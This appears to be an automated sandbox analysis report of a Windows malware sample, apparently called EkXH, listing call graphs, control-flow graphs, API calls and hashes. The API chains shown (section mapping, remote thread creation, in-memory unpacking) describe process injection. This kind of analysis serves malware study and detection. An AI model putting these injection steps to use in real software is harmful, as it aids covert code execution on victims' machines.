FreeEnvironmentStringsA 4032->4034 4035 41897c 4032->4035 4033->4035 4034->4035 4036 4189ad 4035->4036 4038 418940 4035->4038 4036->4026 4036->4027 4041 4188c0 4038->4041 4042 4188eb 4041->4042 4043 4188dc SetPriorityClass 4041->4043 4042->4035 4043->4042 4108 4014db 4109 40148f 4108->4109 4117 401469 4108->4117 4109->4108 4110 4015d5 NtDuplicateObject 4109->4110 4109->4117 4111 4015f2 NtCreateSection 4110->4111 4110->4117 4112 401672 NtCreateSection 4111->4112 4113 401618 NtMapViewOfSection 4111->4113 4115 40169e 4112->4115 4112->4117 4113->4112 4114 40163b NtMapViewOfSection 4113->4114 4114->4112 4116 401659 4114->4116 4115->4117 4118 4016a8 NtMapViewOfSection 4115->4118 4116->4112 4118->4117 4119 4016cf NtMapViewOfSection 4118->4119 4119->4117 4077 22003c 4078 220049 4077->4078 4090 220e0f SetErrorMode SetErrorMode 4078->4090 4083 220265 4084 2202ce VirtualProtect 4083->4084 4086 22030b 4084->4086 4085 220439 VirtualFree 4089 2204be LoadLibraryA 4085->4089 4086->4085 4088 2208c7 4089->4088 4091 220223 4090->4091 4092 220d90 4091->4092 4093 220dad 4092->4093 4094 220dbb GetPEB 4093->4094 4095 220238 VirtualAlloc 4093->4095 4094->4095 4095->4083 4249 401922 4250 401930 4249->4250 4251 401946 Sleep 4250->4251 4252 401961 4251->4252 4253 401529 7 API calls 4252->4253 4254 401972 4252->4254 4253->4254 4271 401534 4272 401546 4271->4272 4273 4015d5 NtDuplicateObject 4272->4273 4280 4016f1 4272->4280 4274 4015f2 NtCreateSection 4273->4274 4273->4280 4275 401672 NtCreateSection 4274->4275 4276 401618 NtMapViewOfSection 4274->4276 4278 40169e 4275->4278 4275->4280 4276->4275 4277 40163b NtMapViewOfSection 4276->4277 4277->4275 4279 401659 4277->4279 4278->4280 4281 4016a8 NtMapViewOfSection 4278->4281 4279->4275 4281->4280 4282 4016cf NtMapViewOfSection 4281->4282 4282->4280 4044 402ffa 4045 40313d 4044->4045 4046 403024 4044->4046 4046->4045 4047 4030df RtlCreateUserThread NtTerminateProcess 4046->4047 4047->4045 4048 402ebc 4049 402eb4 4048->4049 4050 402f18 4049->4050 4053 402f4c 4049->4053 4054 4020ea 4049->4054 4050->4053 4059 401902 4050->4059 4055 4020fb 4054->4055 4056 40214e 4055->4056 4057 402152 NtQuerySystemInformation 4055->4057 4058 40216e 4055->4058 4056->4055 4056->4057 4057->4056 4058->4050 4060 401913 4059->4060 4061 401946 Sleep 4060->4061 4062 401961 4061->4062 4064 401972 4062->4064 4065 401529 4062->4065 4064->4053 4066 401539 4065->4066 4067 4015d5 NtDuplicateObject 4066->4067 4074 4016f1 4066->4074 4068 4015f2 NtCreateSection 4067->4068 4067->4074 4069 401672 NtCreateSection 4068->4069 4070 401618 NtMapViewOfSection 4068->4070 4072 40169e 4069->4072 4069->4074 4070->4069 4071 40163b NtMapViewOfSection 4070->4071 4071->4069 4073 401659 4071->4073 4072->4074 4075 4016a8 NtMapViewOfSection 4072->4075 4073->4069 4074->4064 4075->4074 4076 4016cf NtMapViewOfSection 4075->4076 4076->4074 4120 4020fc 4121 402107 4120->4121 4122 402152 NtQuerySystemInformation 4121->4122 4123 40216e 4121->4123 4122->4121

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 10 418b48-418b4e 9->10 12 418b50-418b56 10->12 13 418b5c-418b66 10->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->10 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 22->26 27 418cad-418caf WaitForSingleObject 22->27 23->22 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 37 418dd0-418de0 35->37 42 418dfd-418e0e call 4189d0 36->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->36 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 55 418e43-418e4e InterlockedCompareExchange 52->55 56 418e54-418e5b 52->56 55->56 56->46 57 418e5d-418e6d 56->57 59 418e70-418e80 57->59 60 418e82 59->60 61 418e89-418e8c 59->61 60->61 61->59 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                    APIs
                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                    • GetFocus.USER32 ref: 00418B91
                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                    • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                    • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                    • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                    • SetCommState.KERNEL32(00000000,00000000), ref: 00418CD8
                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                    • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                    • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                    • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                    • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                    • LoadLibraryA.KERNEL32(0041A3EC), ref: 00418DF2
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406611305.000000000040B000.00000020.00000001.01000000.0000000B.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_40b000_EkXH.jbxd
                    Similarity
                    • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                    • String ID: k`$}$
                    • API String ID: 2220722107-956986773
                    • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                    • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                    • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                    • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 79 40149a-4014a8 75->79 80 4014fd-4014ff 75->80 83 40156e-40157f 77->83 89 4014c1-4014c8 79->89 82 401501 80->82 80->83 87 401504-401518 82->87 88 40148f 82->88 85 401581 83->85 86 401584-401589 83->86 85->86 97 4018a6-4018ae 86->97 98 40158f-4015a0 86->98 87->89 90 40151a 87->90 88->79 91 401469-401485 call 4011a4 89->91 92 4014ca 89->92 94 401539-401555 90->94 95 40151c-401526 90->95 91->69 92->68 94->71 97->86 106 4018a4-4018b3 98->106 107 4015a6-4015cf 98->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 115 4015d5-4015ec NtDuplicateObject 107->115 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 115->106 117 4015f2-401616 NtCreateSection 115->117 120 401672-401698 NtCreateSection 117->120 121 401618-401639 NtMapViewOfSection 117->121 120->106 124 40169e-4016a2 120->124 121->120 122 40163b-401657 NtMapViewOfSection 121->122 122->120 125 401659-40166f 122->125 124->106 127 4016a8-4016c9 NtMapViewOfSection 124->127 125->120 127->106 129 4016cf-4016eb NtMapViewOfSection 127->129 129->106 132 4016f1 call 4016f6 129->132
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectView
                    • String ID: 1
                    • API String ID: 1652636561-2212294583
                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 248 4015d5-4015ec NtDuplicateObject 240->248 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 248->239 250 4015f2-401616 NtCreateSection 248->250 253 401672-401698 NtCreateSection 250->253 254 401618-401639 NtMapViewOfSection 250->254 253->239 257 40169e-4016a2 253->257 254->253 255 40163b-401657 NtMapViewOfSection 254->255 255->253 258 401659-40166f 255->258 257->239 260 4016a8-4016c9 NtMapViewOfSection 257->260 258->253 260->239 262 4016cf-4016eb NtMapViewOfSection 260->262 262->239 265 4016f1 call 4016f6 262->265
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 294 4015d5-4015ec NtDuplicateObject 286->294 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 294->285 296 4015f2-401616 NtCreateSection 294->296 299 401672-401698 NtCreateSection 296->299 300 401618-401639 NtMapViewOfSection 296->300 299->285 303 40169e-4016a2 299->303 300->299 301 40163b-401657 NtMapViewOfSection 300->301 301->299 304 401659-40166f 301->304 303->285 306 4016a8-4016c9 NtMapViewOfSection 303->306 304->299 306->285 308 4016cf-4016eb NtMapViewOfSection 306->308 308->285 311 4016f1 call 4016f6 308->311
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 336 4018c8 333->336 337 4018b9-4018c4 333->337 334->333 342 4015d5-4015ec NtDuplicateObject 334->342 336->337 339 4018cb-4018ff call 4011a4 336->339 337->339 342->333 344 4015f2-401616 NtCreateSection 342->344 347 401672-401698 NtCreateSection 344->347 348 401618-401639 NtMapViewOfSection 344->348 347->333 351 40169e-4016a2 347->351 348->347 349 40163b-401657 NtMapViewOfSection 348->349 349->347 352 401659-40166f 349->352 351->333 354 4016a8-4016c9 NtMapViewOfSection 351->354 352->347 354->333 356 4016cf-4016eb NtMapViewOfSection 354->356 356->333 359 4016f1 call 4016f6 356->359
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 385 4015d5-4015ec NtDuplicateObject 377->385 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 385->376 387 4015f2-401616 NtCreateSection 385->387 390 401672-401698 NtCreateSection 387->390 391 401618-401639 NtMapViewOfSection 387->391 390->376 394 40169e-4016a2 390->394 391->390 392 40163b-401657 NtMapViewOfSection 391->392 392->390 395 401659-40166f 392->395 394->376 397 4016a8-4016c9 NtMapViewOfSection 394->397 395->390 397->376 399 4016cf-4016eb NtMapViewOfSection 397->399 399->376 402 4016f1 call 4016f6 399->402
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 427 4015d5-4015ec NtDuplicateObject 419->427 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 427->418 429 4015f2-401616 NtCreateSection 427->429 432 401672-401698 NtCreateSection 429->432 433 401618-401639 NtMapViewOfSection 429->433 432->418 436 40169e-4016a2 432->436 433->432 434 40163b-401657 NtMapViewOfSection 433->434 434->432 437 401659-40166f 434->437 436->418 439 4016a8-4016c9 NtMapViewOfSection 436->439 437->432 439->418 441 4016cf-4016eb NtMapViewOfSection 439->441 441->418 444 4016f1 call 4016f6 441->444
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.406605489.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_EkXH.jbxd
                    Similarity
                    • API ID: CreateProcessTerminateThreadUser
                    • String ID:
                    • API String ID: 1921587553-0
                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 464 66c317-66c330 465 66c332-66c334 464->465 466 66c336 465->466 467 66c33b-66c347 CreateToolhelp32Snapshot 465->467 466->467 468 66c357-66c364 Module32First 467->468 469 66c349-66c34f 467->469 470 66c366-66c367 call 66bfd6 468->470 471 66c36d-66c375 468->471 469->468 474 66c351-66c355 469->474 475 66c36c 470->475 474->465 474->468 475->471
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0066C33F
                    • Module32First.KERNEL32(00000000,00000224), ref: 0066C35F
                    Memory Dump Source
                    • Source File: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, Offset: 00669000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_669000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 2cb38bb6a14e0c1d3f4973b88589ddcfe3bafa9d68796fc93675a30b9cd6ae98
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: E0F06231100B11ABD7202AB5A88DABA76E9AF49734F144528E686A56C0DB70EC454A61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 134 22003c-220047 135 220049 134->135 136 22004c-220263 call 220a3f call 220e0f call 220d90 VirtualAlloc 134->136 135->136 151 220265-220289 call 220a69 136->151 152 22028b-220292 136->152 157 2202ce-2203c2 VirtualProtect call 220cce call 220ce7 151->157 154 2202a1-2202b0 152->154 156 2202b2-2202cc 154->156 154->157 156->154 163 2203d1-2203e0 157->163 164 2203e2-220437 call 220ce7 163->164 165 220439-2204b8 VirtualFree 163->165 164->163 167 2205f4-2205fe 165->167 168 2204be-2204cd 165->168 171 220604-22060d 167->171 172 22077f-220789 167->172 170 2204d3-2204dd 168->170 170->167 174 2204e3-220505 170->174 171->172 177 220613-220637 171->177 175 2207a6-2207b0 172->175 176 22078b-2207a3 172->176 186 220517-220520 174->186 187 220507-220515 174->187 178 2207b6-2207cb 175->178 179 22086e-2208be LoadLibraryA 175->179 176->175 180 22063e-220648 177->180 182 2207d2-2207d5 178->182 185 2208c7-2208f9 179->185 180->172 183 22064e-22065a 180->183 188 2207d7-2207e0 182->188 189 220824-220833 182->189 183->172 184 220660-22066a 183->184 190 22067a-220689 184->190 192 220902-22091d 185->192 193 2208fb-220901 185->193 194 220526-220547 186->194 187->194 195 2207e2 188->195 196 2207e4-220822 188->196 191 220839-22083c 189->191 197 220750-22077a 190->197 198 22068f-2206b2 190->198 191->179 199 22083e-220847 191->199 193->192 200 22054d-220550 194->200 195->189 196->182 197->180 203 2206b4-2206ed 198->203 204 2206ef-2206fc 198->204 205 22084b-22086c 199->205 206 220849 199->206 201 2205e0-2205ef 200->201 202 220556-22056b 200->202 201->170 208 22056f-22057a 202->208 209 22056d 202->209 203->204 210 22074b 204->210 211 2206fe-220748 204->211 205->191 206->179 212 22059b-2205bb 208->212 213 22057c-220599 208->213 209->201 210->190 211->210 218 2205bd-2205db 212->218 213->218 218->200
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0022024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_220000_EkXH.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
